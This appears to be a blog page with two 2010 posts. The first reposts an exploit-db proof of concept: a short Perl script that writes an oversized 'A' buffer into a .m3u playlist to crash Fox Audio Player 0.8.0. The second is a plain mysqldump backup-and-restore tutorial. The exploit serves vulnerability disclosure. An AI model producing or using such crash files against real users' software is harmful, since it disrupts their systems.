Monday, September 27, 2010

Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Leandro Nini #
# #
# Software Link: #
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
 #!/usr/bin/perl

my $file= "Crash.m3u";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u File Created successfully\n";
close($FILE);


http://www.exploit-db.com/exploits/15131/ 

Thursday, September 16, 2010

Backup/Restore MySQL Database Via SSH



It's Possible To Backup/Resotre MySQL Database In SSH, There Is Tool "MySQLDump", Whenever You Install MySQL, MySQLDUMP Will Be Automatically Installed, It's In The MySQL Package.

At First, Let's See How We Can Backup The Database Via SSH, Use The Following Command In SSH:

mysqldump --opt -u username -p databasename > backupfilename.dump
I Think There Is No Need To Explain The Command!!!!
Just Enter Your Username And Your Database Name, After That, The Name Of The Dumped File And When You Enter, It Asks For The Password And After That The Database Dumps.

Now, Let's See How To Restore The Database, Another Simple Command:

mysql -u username -p databasename < backupfilename.dump

Similar To The Previous One.
It's Done Right Now, Simple Backup And Simple Restore....